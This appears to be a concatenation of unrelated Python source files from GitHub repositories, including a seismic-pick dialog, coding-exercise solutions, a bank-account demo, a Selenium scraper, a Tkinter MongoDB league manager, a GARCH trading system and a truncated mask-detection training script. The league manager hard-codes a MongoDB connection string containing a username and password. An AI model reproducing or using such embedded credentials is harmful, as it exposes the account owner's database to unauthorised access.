            plot.setXRange(0, x_max * 1.001, padding=0)
            plot.setYRange(-1, 1, padding=0)
            plot.getAxis('bottom').setStyle(showValues=False)
            plot.getAxis('left').setStyle(showValues=False)
            plot.showGrid(x=True, y=True)
            plot.hideButtons()
            # cross hair auto
            vLineAuto = qtg.InfiniteLine(angle=90, movable=False, pen=qtg.mkPen(qtg.mkColor("g")))
            self._line_auto_list.append(vLineAuto)
            plot.addItem(vLineAuto, ignoreBounds=True)
            # cross hair
            vLine = qtg.InfiniteLine(angle=90, movable=True, pen=qtg.mkPen(qtg.mkColor("b")))
            self._line_list.append(vLine)
            plot.addItem(vLine, ignoreBounds=True)
            fa = self._find_fa(i)
            if fa is not None:
                if fa.verified:
                    t = fa.time
                else:
                    # Unverified picks are parked slightly off-plot at -0.1 s.
                    t = -0.1
                vLine.setPos(t)
                checkbox.setChecked(fa.use)
                vLineAuto.setPos(fa.time_auto)
        if self._plot_list:
            # One scene is shared by all plots; a single connection suffices.
            self._plot_list[0].scene().sigMouseClicked.connect(self.mouseClickEvent)
            #plot.setLabel('bottom', "Time", units='s')
            #plot.getAxis('bottom').setStyle(showValues=True)
        self._graphic_wiget.setMinimumSize(100, 150 * row)
    def mouseClickEvent(self, ev):
        """Right click on a trace snaps its manual pick to the auto pick."""
        if ev.button() == QtCore.Qt.RightButton:
            for i, plot in enumerate(self._plot_list):
                if plot.sceneBoundingRect().contains(ev.scenePos()):
                    self._line_list[i].setPos(self._line_auto_list[i].getPos()[0])
                    ev.accept()
                    break
    def _find_fa(self, channel):
        """Return the stored first-arrival record for (this file, channel),
        or None when no record exists."""
        for fa in self.genie.current_inversion_cfg.first_arrivals:
            if fa.file == self._measurement.file and fa.channel == channel:
                return fa
        return None
    def reject(self):
        """Persist pick positions and "use" flags back into the inversion
        configuration, then close the dialog."""
        for i, vLine in enumerate(self._line_list):
            fa = self._find_fa(i)
            if fa is not None:
                line_pos = float(vLine.getPos()[0])
                if line_pos > 0:
                    fa.time = line_pos
                    fa.verified = True
                else:
                    # Lines parked at/below zero mean "no manual pick".
                    fa.time = 0.0
                    fa.verified = False
                fa.use = self._checkbox_list[i].isChecked()
        super().reject()
| GeoMop/Genie | src/genie/ui/dialogs/first_arrival_dialog.py | first_arrival_dialog.py | py | 6,825 | python | en | code | 1 | github-code | 36 |
25625718223 | '''
Given a 2D grid, each cell is either a zombie 1 or a human 0. Zombies can turn adjacent (up/down/left/right) human beings into zombies every hour. Find out how many hours does it take to infect all humans?
Example:
Input:
[[0, 1, 1, 0, 1],
[0, 1, 0, 1, 0],
[0, 0, 0, 0, 1],
[0, 1, 0, 0, 0]]
Output: 2
Explanation:
At the end of the 1st hour, the status of the grid:
[[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[0, 1, 0, 1, 1],
[1, 1, 1, 0, 1]]
At the end of the 2nd hour, the status of the grid:
[[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1],
[1, 1, 1, 1, 1]]
int minHours(int rows, int columns, List<List<Integer>> grid) {
}
'''
def solution(input_matrix):
    """Hours for zombies (1) to infect every human (0) via 4-neighbour spread.

    Multi-source BFS from every initial zombie, one level per hour. The grid
    is mutated in place, like the original implementation. Returns -1 when
    some human can never be infected (e.g. a grid with no zombie at all);
    the original rescanned the whole grid each hour — O(cells^2) — printed
    the grid every iteration, and looped forever in that case.
    """
    from collections import deque
    rows, cols = len(input_matrix), len(input_matrix[0])
    frontier = deque()
    humans = 0
    for r in range(rows):
        for c in range(cols):
            if input_matrix[r][c] == 1:
                frontier.append((r, c))
            else:
                humans += 1
    hours = 0
    while humans and frontier:
        hours += 1
        # Process exactly one BFS level = one hour of spreading.
        for _ in range(len(frontier)):
            r, c = frontier.popleft()
            for nr, nc in ((r - 1, c), (r + 1, c), (r, c - 1), (r, c + 1)):
                if 0 <= nr < rows and 0 <= nc < cols and input_matrix[nr][nc] == 0:
                    input_matrix[nr][nc] = 1
                    humans -= 1
                    frontier.append((nr, nc))
    return hours if humans == 0 else -1
# Sample grid from the problem statement; expected output: 2.
input_matrix = [[0, 1, 1, 0, 1],
                [0, 1, 0, 1, 0],
                [0, 0, 0, 0, 1],
                [0, 1, 0, 0, 0]]
print(solution(input_matrix))
4876381764 | import re
import pandas as pd
import m4i_metrics.config as config
from ..Metric import Metric
from ..MetricColumnConfig import MetricColumnConfig
from ..MetricConfig import MetricConfig
# Result-table schema for elements whose names are not sentence-formatted.
elems_non_compliant_config = MetricConfig(**{
    'description': 'The names of these elements are not structured as a sentence',
    'id_column': 'id',
    'data': {
        'id': MetricColumnConfig(**{
            'displayName': 'ID',
            'description': 'The identifier of the element'
        }),
        'name': MetricColumnConfig(**{
            'displayName': 'Current name',
            'description': 'The current name of the element'
        }),
        'rec_name': MetricColumnConfig(**{
            'displayName': 'Suggested name',
            'description': 'The suggested name of the element'
        })
    }
})
# Result-table schema for non-compliant relationship names.
rels_non_compliant_config = MetricConfig(**{
    'description': 'The names of these relationships are not structured as a sentence',
    'id_column': 'id',
    'data': {
        'id': MetricColumnConfig(**{
            'displayName': 'ID',
            'description': 'The identifier of the relationship'
        }),
        'name': MetricColumnConfig(**{
            'displayName': 'Current name',
            'description': 'The current name of the relationship'
        }),
        'rec_name': MetricColumnConfig(**{
            'displayName': 'Suggested name',
            'description': 'The suggested name of the relationship'
        })
    }
})
# Result-table schema for non-compliant view names.
views_non_compliant_config = MetricConfig(**{
    'description': 'The names of these views are not structured as a sentence',
    'id_column': 'id',
    'data': {
        'id': MetricColumnConfig(**{
            'displayName': 'ID',
            'description': 'The identifier of the view'
        }),
        'name': MetricColumnConfig(**{
            'displayName': 'Current name',
            'description': 'The current name of the view'
        }),
        'rec_name': MetricColumnConfig(**{
            'displayName': 'Suggested name',
            'description': 'The suggested name of the view'
        })
    }
})
# "Sentence case": capitalized first word, then space-separated words.
sentence = re.compile(
    r"^[A-Z1-90][a-zA-Z1-90\.\-_\(\)\[\])]*([ ][A-Za-z1-90\(\)\[\]][a-zA-Z1-90\.\-_\(\)\[\])]*|$)*$"
)
class ConceptLabelFormattingMetric(Metric):
    """Checks that element, relationship and view names read as sentences."""
    id = '8ddd174e-0c42-478b-b719-8d678a72304f'
    label = 'Concept Label Formatting'
    @staticmethod
    def calculate(model):
        """Tag names against the `sentence` regex and return, per concept
        kind, the non-compliant rows plus suggested (capitalized) names."""
        elems = model.nodes.copy()
        rels = model.edges.copy()
        views = model.views.copy()
        # Compliance: elements/views must match the sentence pattern;
        # relationships must be 'Yes', 'No' or empty.
        elems['sentence'] = elems.name.apply(lambda x: config.COMPLIANT_TAG if not sentence.match(
            x) == None else config.NON_COMPLIANT_TAG)
        rels['sentence'] = rels.name.apply(lambda x: config.COMPLIANT_TAG if x in [
            'Yes', 'No'] or x is None or len(x) == 0 else config.NON_COMPLIANT_TAG)
        views['sentence'] = views.name.apply(lambda x: config.COMPLIANT_TAG if not sentence.match(
            x) == None else config.NON_COMPLIANT_TAG)
        # Suggested fix: capitalize, but only when the result is compliant.
        elems['rec_name'] = elems.name.apply(
            lambda x: x.capitalize() if sentence.match(x.capitalize()) else '')
        rels['rec_name'] = rels.name.apply(
            lambda x: x.capitalize() if x.capitalize() in ['Yes', 'No'] else '')
        views['rec_name'] = views.name.apply(
            lambda x: x.capitalize() if sentence.match(x.capitalize()) else '')
        elems_non_compliant = elems[elems.sentence == config.NON_COMPLIANT_TAG][[
            'id', 'name', 'rec_name']]
        rels_non_compliant = rels[rels.sentence == config.NON_COMPLIANT_TAG][[
            'id', 'name', 'rec_name']]
        views_non_compliant = views[views.sentence == config.NON_COMPLIANT_TAG][[
            'id', 'name', 'rec_name']]
        return {
            "elements": {
                "config": elems_non_compliant_config,
                "data": elems_non_compliant,
                "sample_size": len(elems.index),
                "type": 'metric'
            },
            "relationships": {
                "config": rels_non_compliant_config,
                "data": rels_non_compliant,
                "sample_size": len(rels.index),
                "type": 'metric'
            },
            "views": {
                "config": views_non_compliant_config,
                "data": views_non_compliant,
                "sample_size": len(views.index),
                "type": 'metric'
            }
        }
    # END of calculate
    def get_name(self):
        """Return the metric's class name identifier."""
        return 'ConceptLabelFormattingMetric'
    # END get_name
# END ConceptLabelFormattingMetric
| wombach/docker-python-rest | extra_modules/metrics/m4i_metrics/textual/ConceptLabelFormattingMetric.py | ConceptLabelFormattingMetric.py | py | 4,592 | python | en | code | 1 | github-code | 36 |
8926252017 | ##############################################################################################
# File: diceSim.py
# Author: Sam Wareing
# Description: script to determine probability of dice rolls using monte carlo simulation
#
#
#
##############################################################################################
import sys
from random import randint
from collections import Counter
def simulateDiceRolls(dice, num_simulations):
counts = Counter()
for roll in range(num_simulations):
counts[sum((randint(1, sides) for sides in dice))] += 1
print("\nOUTCOME\tPROBABILITY")
for outcome in range(len(dice), sum(dice)+1):
print('{}\t{:0.2f}%'.format(outcome, counts[outcome]*100/num_simulations))
def usage():
    """Show how to invoke the script: one side-count argument per die."""
    print("diceSim.py # # #....")
if __name__ == "__main__":
    print("let's sim some dice")
    if len(sys.argv) < 2:
        # At least one die (its side count) must be given on the command line.
        usage()
        # sys.exit replaces the site-module exit(): it is always available in
        # scripts and signals the usage error with a non-zero status.
        sys.exit(1)
    num_simulations = input("How many simulations? press enter for default 1000000 ")
    if num_simulations == "":
        num_simulations = 1000000
    else:
        num_simulations = int(num_simulations)
    # Every positional argument is the number of sides of one die.
    dice = [int(arg) for arg in sys.argv[1:]]
    simulateDiceRolls(dice, num_simulations)
| sjwar455/PythonCodeChallenges | diceSim.py | diceSim.py | py | 1,183 | python | en | code | 0 | github-code | 36 |
12486902960 | """
Basic Syntax, Conditional Statements and Loops - Exercise
Check your code: https://judge.softuni.bg/Contests/Compete/Index/1719#7
Video: https://www.youtube.com/watch?time_continue=4&v=7sHE4HEUqi8
SUPyF2 Basic Exercise - 08. Mutate Strings (not included in final score)
Problem:
You will be given two strings. Transform the first string into the second one, one letter at a time and print it.
Print only the unique strings
Note: the strings will have the same lengths
Examples:
Input:
bubble gum
turtle hum
Output:
tubble gum
turble gum
turtle gum
turtle hum
turtle ham
Input:
Kitty
Doggy
Output:
Ditty
Dotty
Dogty
Doggy
"""
# Read the start and target strings as mutable character lists.
current = list(input())
target = list(input())

# Walk both strings in lockstep; every time a character differs, adopt the
# target character and print the new (unique) intermediate string.
for position, wanted in enumerate(target):
    if current[position] != wanted:
        current[position] = wanted
        print("".join(current))
| SimeonTsvetanov/Coding-Lessons | SoftUni Lessons/Python Development/Python Fundamentals September 2019/Problems And Files/05 EX. B. SYNTAX, CONDITIONAL STATE. AND LOOPS - Дата 20-ти септември, 1430 - 1730/08. Mutate Strings.py | 08. Mutate Strings.py | py | 917 | python | en | code | 9 | github-code | 36 |
40420933577 | # projekt Konto_bankowe, w dalszej części komentarzy referencje do obketów są nazywane obiektami:
from konto import * #import the classes and helpers defined in konto.py

# --- Create one account of each type (in these comments, object references are simply called "objects") ---
konto1 = Konto(1000) #Konto object -> balance (stan_konta) = 1000
konto2 = KontoBankowe("Janas", 2000) #KontoBankowe object -> surname = "Janas", balance = 2000
konto3 = KontoOsobiste(0, "Kowalski", 3000) #KontoOsobiste object -> minimum balance = 0, surname = "Kowalski", balance = 3000
konto4 = KontoOsobiste(0, "Ratajczak", 3000) #as above, surname = "Ratajczak"
konto5 = KontoOsobiste(0, "Borowski", 3000) #as above, surname = "Borowski"
konto6 = KontoOsobiste(0, "Kosmyk", 3000) #as above, surname = "Kosmyk"
bank = Bank() #create the Bank object
# Register every account object in the bank's internal account list.
bank.dodaj_konto(konto1)
bank.dodaj_konto(konto2)
bank.dodaj_konto(konto3)
bank.dodaj_konto(konto4)
bank.dodaj_konto(konto5)
bank.dodaj_konto(konto6)
raport = RaportKonta() #create the account-report object
# Print a report for one account of each type.
print("Raport konto1:")
raport.raport(konto1)
print("\nRaport konto2:")
raport.raport(konto2)
print("\nRaport konto3:")
raport.raport(konto3)
konto3.wplata(100) #deposit -> balance of konto3 += 100
print("\nRaport konto3 po wpłacie 100zł:")
raport.raport(konto3)
print("\nRaport konto3 po wypłacie 50zł :")
konto3.wyplata(50) #withdrawal -> balance of konto3 -= 50
raport.raport(konto3)
# Exceptions part of the project:
print("-----------------\nWYJĄTKI\n-----------------")
print("{}zł - stan konta nr1 przed przelewem".format(konto1.get_stan_konta()))
print("{}zł - stan konta nr3 przed przelewem\n".format(konto3.get_stan_konta()))
# Transfer 1000 between the accounts at indices 0 and 2 of the bank's list.
bank.przelew(0,2,1000)
print("{}zł - stan konta nr1 po przelewie".format(konto1.get_stan_konta()))
print("{}zł - stan konta nr3 po przelewie\n".format(konto3.get_stan_konta()))
# Repeating the same transfer is expected to fail and report a
# NieudanyPrzelewException through its get_komunikat() method.
bank.przelew(0,2,1000)
# Objects-in-data-structures part of the project:
print("-----------------\nOBIEKTY W STRUKTURACH DANYCH\n-----------------")
bank.przelew(2,5,1000) #transfer 1000 from the account at index 2 to index 5
bank.usun_konto(5) #remove the account at index 5; five accounts remain in the list
# Index 5 no longer exists, so this transfer is expected to raise a
# NumerKontaException and print its message.
bank.przelew(2,5,1000)
print("\n")
# Summary of KontoOsobiste accounts only: count and combined balance.
bank.raport_konta_osobiste()
print("\n")
# Summary of all Konto accounts: count and combined balance.
bank.raport_wszystkie()
# Iterators part of the project:
print("-----------------\nITERATORY\n-----------------")
iterator = IteratorBanku(bank) #iterator over the bank's account list
for x in iterator:
    print(x)
# Object (de)serialisation part of the project:
print("-----------------\nZAPIS OBIEKTÓW\n-----------------")
zapis_banku = ZapisBank() #writer object
odczyt_banku = OdczytajBank() #reader object
try:
    zapis_banku.zapisz_na_dysk(bank) #persist the Bank object to a file
    # Saving a non-Bank object is expected to raise ZapisException.
    zapis_banku.zapisz_na_dysk(konto1)
except ZapisException as zapis:
    zapis.get_komunikat() #print the ZapisException message
del bank #drop the in-memory Bank object
try:
    bank.raport_wszystkie() #name no longer exists -> NameError
except NameError:
    print("\nBrak obiektu o podanej nazwie!\n")
bank = odczyt_banku.odczytaj_z_dysku() #recreate the Bank object from the file
bank.raport_wszystkie()
| TheItaroshi/Studies | konto_bankowe/venv/main.py | main.py | py | 7,308 | python | pl | code | 0 | github-code | 36 |
626133283 |
import os
from collections import OrderedDict
import tensorflow as tf
class KBest(tf.keras.callbacks.Callback):
    """
    A subclass of the Keras callback base class that keeps only the best
    (lowest-loss) k checkpoints of the run, deleting the others from disk
    (instead of the single best checkpoint that Tf keeps natively).

    Attributes
    ----------
    output_path: str
        Path where the checkpoints are saved (files live under <output_path>/ckpt)
    files_loss: dict
        Maps each recorded checkpoint file name to the training loss of its epoch
    k: int
        Number of checkpoints to keep; None disables pruning

    Methods:
    ----------
    on_epoch_end(self, epoch, logs)
        At the end of each epoch, record this epoch's checkpoint and delete the
        stored checkpoints with the highest losses, keeping only the best k
    """

    def __init__(self, output_path, k=None):
        """
        Parameters
        ----------
        output_path: str
            Path where the checkpoints are saved
        k: int
            Number of checkpoints to keep (None keeps everything)
        """
        super().__init__()
        self.output_path = output_path
        self.files_loss = {}
        self.k = k

    def on_epoch_end(self, epoch, logs=None):
        """
        Parameters
        ----------
        epoch: int
            Epoch number (0-based, as supplied by Keras)
        logs: dict
            Metrics of the current epoch; must contain "loss"
        """
        if logs is None:
            logs = {}
        if self.k is None:
            return
        loss = logs["loss"]
        # BUG FIX: the original read self.epoch, which is never assigned
        # anywhere (Keras passes the epoch as an argument instead), so this
        # line raised AttributeError on every epoch; use the epoch parameter.
        # NOTE(review): this name must match the file name pattern of whatever
        # callback actually writes the checkpoints (Keras's ModelCheckpoint
        # numbers files with epoch + 1) -- confirm against the training setup.
        name = "weights." + str("{:02d}".format(epoch)) + '-' + str("{:.2f}".format(loss)) + '.hdf5'
        self.files_loss[name] = loss
        if len(self.files_loss) >= self.k:
            # Sort by loss in decreasing order so the worst checkpoints come first.
            d_descending = OrderedDict(sorted(self.files_loss.items(), key=lambda kv: kv[1], reverse=True))
            # Delete everything beyond the k best (lowest-loss) entries.
            num_deletions = len(d_descending) - self.k
            file_delete = list(d_descending.items())[0:num_deletions]
            for name, _ in file_delete:
                path = os.path.join(self.output_path, 'ckpt', name)
                os.remove(path)
                del self.files_loss[name]
| BNN-UPC/ignnition | ignnition/custom_callbacks.py | custom_callbacks.py | py | 2,203 | python | en | code | 40 | github-code | 36 |
class Solution:
    def numRollsToTarget(self, d: int, f: int, target: int) -> int:
        """Count the distinct sequences of d rolls of an f-faced die whose
        faces sum to target, modulo 10**9 + 7.

        Bottom-up dynamic programming: ways[t] holds the number of ways to
        reach sum t with the dice processed so far; each die extends every
        reachable sum by one face value.
        """
        MOD = 10 ** 9 + 7
        ways = [0] * (target + 1)
        ways[0] = 1  # zero dice can only produce a sum of zero
        for _ in range(d):
            nxt = [0] * (target + 1)
            for total in range(1, target + 1):
                # The newest die shows some face in 1..min(f, total).
                nxt[total] = sum(ways[total - face] for face in range(1, min(f, total) + 1))
            ways = nxt
        return ways[target] % MOD
28678725652 | from selenium import webdriver
from selenium.webdriver.common.by import By
from webdriver_manager.firefox import GeckoDriverManager
# Launch Firefox through a driver binary that webdriver_manager downloads.
browser = webdriver.Firefox(executable_path=GeckoDriverManager().install())

# Redmine issue numbers to scrape.
codigos = ['22316', '21897', '22469', '22192', '22567', '22153', '21778', '22281', '22941', '22882', '21603', '22740', '21587', '23009', '22500', '22424',
           '23167', '22423', '22816', '23103', '22592', '23317', '23067', '22804']
url = 'http://redmine.rs.dbseller.com.br/issues/'

try:
    # 'with' guarantees the output file is flushed and closed (the original
    # opened it and never closed it); try/finally guarantees the browser is
    # quit even if a page fails to load or lacks the expected elements.
    with open('redmines.txt', 'w') as file:
        for codigo in codigos:
            browser.get(url + codigo)
            file.write(browser.title)
            file.write("\n\n")
            # The second element with class "wiki" appears to hold the issue
            # description (hence the [1] index) -- TODO confirm on the site.
            descricao = browser.find_elements(By.CLASS_NAME, "wiki")
            resultado = descricao[1].find_elements(By.TAG_NAME, "p")
            for x in resultado:
                linha = x.get_attribute('innerHTML')
                linha = linha.replace('<br>', '')
                file.write(linha + "\n")
            file.write("\n\n")
            file.write("\n\n")
finally:
    browser.quit()
72774382185 | import tkinter as tk
from tkinter import messagebox
from pymongo import MongoClient
from UserInterface.GlobalResources.GuiObjectsFactories import \
MessageBox, \
ImagedButtonWithText
from UserInterface.MainMenu.MonitoredLeagues.ManageMonitoredLeagues.ManageMonitoredLeagues import \
manage_monitored_leagues
from UserInterface.MainMenu.MonitoredLeagues.AddLeague.AddLeague import add_new_league
def mon_leagues_window(parent):
    """Open the "Manage Monitored Leagues" window.

    Destroys *parent* (when given), loads the league documents from MongoDB,
    and builds a navigation panel whose buttons swap sub-menus in and out of
    the activities panel.  Blocks in tk's mainloop until the window is closed.
    """
    # ------------------------------ Data handling functions ------------------------------------------
    def call_league_data():
        """
        Compile league data required for sub-menus (list of league documents).
        """
        def retrieve_all_leagues():
            # SECURITY(review): the MongoDB username/password are hard-coded in
            # this connection string; move them to a config file or environment
            # variable and rotate the exposed credentials.
            client = MongoClient('mongodb+srv://RubenFerreira:TPVXAliOZt3OqFpk@11sixteen.zzyri.mongodb.net/test?')
            db = client['football_data']
            collection = db['leagues']
            return collection
        def collection_to_list(collection):
            # Materialise the Mongo cursor into a plain Python list.
            leagues_lst = []
            for document in collection.find():
                leagues_lst.append(document)
            return leagues_lst
        # --------- main DB call processes ------------
        collection = retrieve_all_leagues()
        all_leagues_list = collection_to_list(collection)
        return all_leagues_list
    # ---------------------- Window sub-menu initialisation functions --------------------------
    def manage_mon_lea():
        # Clear the activities panel of any previous sub-menu widgets.
        for child in act_panel.winfo_children():
            child.destroy()
        # Hand the empty activities panel to the sub-menu to populate.
        manage_monitored_leagues(act_panel, leagues_list)
        act_panel.grid(column=1, row=0, padx=10, pady=10, sticky='NW')
    def add_new_lea():
        # Clear the activities panel of any previous sub-menu widgets.
        for child in act_panel.winfo_children():
            child.destroy()
        # Hand the empty activities panel to the sub-menu to populate.
        add_new_league(act_panel, leagues_list)
        act_panel.grid(column=1, row=0, padx=10, pady=10, sticky='NW')
    # ---------------------------------------- Window management --------------------------------
    def on_closing():
        # Confirm before destroying the window; unsaved changes are lost.
        MsgBox = messagebox.askquestion('Exit Window',
                                        f'Are you sure you want to close this window - Any unsaved changes will be '
                                        f'lost?',
                                        icon='question')
        if MsgBox == 'yes':
            mon_league_win.destroy()
    # ------------------------------------ Main processes -----------------------------------------------------
    if parent is not None:
        parent.destroy()
    # Window Setup: full-screen-sized top-level window with a close handler.
    mon_league_win = tk.Tk()
    mon_league_win.title("11Sixteen Database Management Controller - Manage Monitored Leagues")
    mon_league_win.geometry("%dx%d+0+0" % (mon_league_win.winfo_screenwidth(), mon_league_win.winfo_screenheight()))
    mon_league_win.protocol("WM_DELETE_WINDOW", on_closing)
    # ----------------- DB call -------------------------
    # Tell the user about the delay while league data is fetched from the DB.
    message_box = MessageBox(mon_league_win)
    message_box.place(relx=0.5, rely=0.5, anchor='center')
    message_box.update_content(mon_league_win, "Collecting monitored league data - one moment")
    leagues_list = call_league_data()
    message_box.destroy()
    # Object creation: navigation panel (left) and activities panel (right).
    nav_panel = tk.Frame(mon_league_win, borderwidth=1, highlightbackground="black", relief='solid')
    nav_messenger = MessageBox(nav_panel, "Sub-menu navigation panel", width=25, height=4,
                               wraplength=100, justify='center')
    act_panel = tk.Frame(mon_league_win, borderwidth=1, highlightbackground="black", relief='solid')
    # NOTE(review): these icon paths are absolute and machine-specific.
    man_mon_lea_btn = ImagedButtonWithText(nav_panel,
                                           'C:\\Users\\rferreira\\GitHub\\11Sixteen\\UserInterface\\GlobalResources\\Images_Icons\\manage_monitored_leagues_icon.png',
                                           "LargeGroove", "Manage Monitored Leagues")
    add_lea_btn = ImagedButtonWithText(nav_panel,
                                       'C:\\Users\\rferreira\\GitHub\\11Sixteen\\UserInterface\\GlobalResources\\Images_Icons\\add_league.png',
                                       "LargeGroove", "Add New League")
    # Object binding: each button loads its sub-menu into the activities panel.
    man_mon_lea_btn.btn.config(command=manage_mon_lea)
    add_lea_btn.btn.config(command=add_new_lea)
    # Object placement
    nav_panel.grid(column=0, row=0, padx=10, pady=10, sticky='NW')
    nav_messenger.grid(column=0, row=0, padx=10, pady=10, sticky='N')
    act_panel.grid(column=1, row=0, padx=10, pady=10, sticky='NW')
    man_mon_lea_btn.frame.grid(column=0, row=1, padx=10, pady=10, sticky='N')
    add_lea_btn.frame.grid(column=0, row=2, padx=10, pady=10, sticky='N')
    # Main window mainloop: blocks until the window is destroyed.
    mon_league_win.mainloop()
# Launch the window stand-alone (there is no parent window to destroy).
if __name__ == "__main__":
    mon_leagues_window(None)
| SigmaFireFox/SigmaFox | apps/eleven10ths/src/app/11sixteen-desktop-app/UserInterface/MainMenu/MonitoredLeagues/MonitoredLeagues.py | MonitoredLeagues.py | py | 4,954 | python | en | code | 0 | github-code | 36 |
25798887132 | grade = ['A+','A0','A-','B+','B0','B-','C+','C0','C-']
t = int(input())  # number of test cases
for case_no in range(1, t + 1):
    n, k = map(int, input().split())  # class size and the student id to grade
    # Each letter grade covers one tenth of the class.
    bucket = n / 10
    totals = []
    for student_id in range(1, n + 1):
        mid, fin, proj = map(int, input().split())
        # Weighted total: midterm 35%, final 45%, project 20%.
        totals.append((student_id, round(mid * 0.35 + fin * 0.45 + proj * 0.2)))
    # Rank the class by total score, best first (sorted() is stable).
    by_score = sorted(totals, key=lambda entry: entry[1], reverse=True)
    for rank, (student_id, _) in enumerate(by_score):
        if student_id == k:
            print(f'#{case_no}', grade[int(rank // bucket)])
| 00purplecandy00/Algorithm-Test-03 | 2200072/조교의성적매기기.py | 조교의성적매기기.py | py | 569 | python | en | code | null | github-code | 36 |
14029690592 | from django import forms
from . models import Contact
class ContactForm(forms.ModelForm):
    """ModelForm for Contact entries with Bootstrap-styled widgets.

    Every field sets an empty label and relies on the widget's placeholder
    text instead, so the Turkish labels declared in Meta.labels below never
    appear -- presumably leftovers; confirm before removing them.
    """
    name = forms.CharField(label = "",widget = forms.TextInput(attrs={
        'class':'form-control',
        'placeholder' : 'Full Name',
        'required' : 'required',
    }))
    email = forms.EmailField(label= '',widget = forms.EmailInput(attrs={
        'class':'form-control',
        'placeholder' : 'Email',
        'required' : 'required',
    }))
    phone = forms.CharField(label='',widget = forms.TextInput(attrs={
        'class':'form-control',
        'placeholder' : 'Phone',
        'required' : 'required',
    }))
    message = forms.CharField(label='',widget = forms.Textarea(attrs={
        'class':'form-control',
        'placeholder' : 'Message',
        'required' : 'required',
    }))
    class Meta:
        # Backed by the Contact model; only these four fields are rendered.
        model = Contact
        fields = ['name','email','phone','message']
        labels = {
            'name':'İsim Soyisim',
            'email':'eposta',
        }
1828127496 | import json
import os
from pathlib import Path
from typing import List, Tuple
import numpy as np
from arch import arch_model
from systems_util import get_futures_list, get_settings, normalize_weights
def myTradingSystem(DATE: List[int], CLOSE: np.ndarray, settings) -> Tuple[np.ndarray, dict]:
    """Quantiacs entry point: pick a position for every market on each day.

    For each future, a GARCH(p, q) model with parameters stored on disk
    (models/garch/params/<ticker>_params.txt) forecasts next-step variance;
    the position is long/flat or short/flat depending on the ticker's stored
    correlation value and whether the forecast volatility exceeds the sample
    volatility.  Returns the normalized weight vector and the settings dict.
    """
    print(f"Predicting for: {DATE[-1]}")
    # Drop the first market row (settings["markets"][0] is "CASH") and work
    # with log-returns along the time axis.
    CLOSE = np.transpose(CLOSE)[1:]
    log_return = np.diff(np.log(CLOSE))
    positions: List[int] = []
    # Per-ticker correlation values precomputed offline and stored as JSON.
    storage_dir = Path(os.path.dirname(__file__)).parent / "../models/garch/correlation.txt"
    with open(storage_dir) as f:
        cor_dict = json.load(f)
    for index, ticker in enumerate(settings["markets"]):
        if ticker == "CASH":
            positions.append(0)
            continue
        print(f"Predicting for: {ticker}")
        params_dir = Path(os.path.dirname(__file__)).parent / f"../models/garch/params/{ticker}_params.txt"
        # NOTE(review): after the transpose, log_return is (market, time), so
        # log_return[:, index-1] selects one TIME column across all markets;
        # a per-ticker series would be log_return[index - 1] -- confirm the
        # intended orientation of CLOSE before changing anything.
        ticker_returns = log_return[:, index-1]
        with open(params_dir) as f:
            params = json.load(f)
        p = params['p']
        q = params['q']
        fixed_params = params['params']
        # Rescale returns (x10) and rebuild the GARCH model with the stored,
        # fixed parameters instead of re-estimating them.
        model = arch_model(ticker_returns * 10 , p=p, q=q)
        fixed_model = model.fix(fixed_params)
        forecast_vol = fixed_model.forecast()
        var = forecast_vol.variance.iloc[-1:]['h.1']
        # flip the inequality signs lol
        # if (cor_dict[ticker] > 0.03)
        """
        if (float(np.sqrt(var)) > np.std(ticker_returns)):
            positions.append(1)
        elif (float(np.sqrt(var)) < np.std(ticker_returns)):
            positions.append(-1)
        else:
            positions.append(0)
        """
        # Low-correlation tickers go long when the forecast volatility exceeds
        # the realised volatility; high-correlation tickers take the short
        # side under the same condition; otherwise stay flat.
        if (cor_dict[ticker] < 0.3):
            if (float(np.sqrt(var)) > np.std(ticker_returns)):
                positions.append(1)
            else:
                positions.append(0)
        elif (cor_dict[ticker] > 0.3):
            if (float(np.sqrt(var)) > np.std(ticker_returns)):
                positions.append(-1)
            else:
                positions.append(0)
        else:
            positions.append(0)
    positions = normalize_weights(weights=positions)
    return positions, settings
def mySettings():
    """Build the Quantiacs settings dict: CASH plus the filtered futures list.

    Uses the project helpers get_settings() and get_futures_list(); futures
    whose lag is statistically insignificant beyond lag 2 are filtered out.
    """
    settings = get_settings()
    futures = get_futures_list(filter_insignificant_lag=2)
    # (The original also built an unused two-symbol list ["F_AD", "F_ES"],
    # apparently for quick experiments; removed as dead code.)
    settings["markets"] = ["CASH", *futures]
    return settings
# Run a Quantiacs backtest of this trading system when executed directly.
if __name__ == '__main__':
    import quantiacsToolbox
    results = quantiacsToolbox.runts(__file__)
| weixue123/quantiacs_algo_trading | systems/garch_system.py | garch_system.py | py | 2,506 | python | en | code | 0 | github-code | 36 |
71193874663 | #Importing the Dependencies
import tensorflow as tf
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.applications import MobileNetV2
from tensorflow.keras.layers import AveragePooling2D
from tensorflow.keras.layers import Dropout
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import Input
from tensorflow.keras.models import Model
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.preprocessing.image import load_img
from tensorflow.keras.utils import to_categorical
from sklearn.preprocessing import LabelBinarizer
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from imutils import paths
import matplotlib.pyplot as plt
import numpy as np
import os
#reading the data folder: one sub-folder per class name
data_file = r"data"
classes = ["with_mask", "without_mask"]
data = []
labels = []
for c in classes:
    path = os.path.join(data_file, c)
    for i in os.listdir(path):
        image_path = os.path.join(path, i)
        # Load at MobileNetV2's expected 224x224 resolution and scale pixels
        # with the model's own preprocessing function.
        img = load_img(image_path, target_size=(224, 224))
        img = img_to_array(img)
        image_array = preprocess_input(img)
        data.append(image_array)
        labels.append(c)
# binarizing labels, then one-hot encoding them (two columns)
binarizer = LabelBinarizer() #instance used again later for class names in the report
binary_labels = binarizer.fit_transform(labels)
labels = to_categorical(binary_labels)
#converting image arrays and labels to numpy arrays
X = np.array(data, dtype="float32")
y = np.array(labels)
#splitting the data and labels (stratified 80/20 split, fixed seed)
(X_train, X_test, y_train, y_test) = train_test_split(X, y, test_size = 0.2, stratify = labels, random_state = 42)
#generating batches of image data with data augmentation
aug = ImageDataGenerator(rotation_range = 20,
                         zoom_range = 0.15,
                         width_shift_range = 0.2,
                         height_shift_range = 0.2,
                         shear_range = 0.15,
